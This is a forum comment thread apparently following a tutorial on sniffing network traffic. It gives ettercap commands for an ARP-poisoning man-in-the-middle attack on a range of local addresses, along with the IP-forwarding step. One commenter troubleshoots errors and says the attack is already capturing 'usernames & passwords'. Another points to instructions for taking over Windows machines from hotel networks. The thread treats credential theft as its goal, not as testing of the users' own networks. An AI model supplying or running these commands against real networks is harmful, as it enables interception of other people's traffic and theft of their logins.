    Then in terminal, type this:
    echo 1 > /proc/sys/net/ipv4/ip_forward

    Then use the command like:
    sudo ettercap -Tq -M arp:remote /10.1.1.1-20/ -P autoadd

    Kudos on the lovely tutorial.
I intend to release one on discovering if the network is switched or not and then what to do from there.
Eg. how to sniff switched or relay etc.

hi, I had already uncommented the 1st part, I had then tried echo 1 > /proc/sys/net/ipv4/ip_forward & it accepted the command, I then type
sudo ettercap -Tq -M arp:remote /192.168.1.65/ -P autoadd which seems to work fine, but I still get errors like below

iptables v1.3.8: can't initialize iptables table `nat': Permission denied (you must be root)
Perhaps iptables or your kernel needs to be upgraded.

FATAL: ip_forwarding was disabled, but we cannot re-enable it now.
    remember to re-enable it manually

Is there anything else I can do, it's not stopping me getting my usernames & passwords, but it spits out this all down the shell for ages

Hi, you can get a tutorial here on how to fully get access to your windowz box, you can pretty much do this from any house/hotel or any 21st century outhouse

You do realize that in the UK, this is a real possibility, I shit you not.

I'll see if I can find the article.
A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.
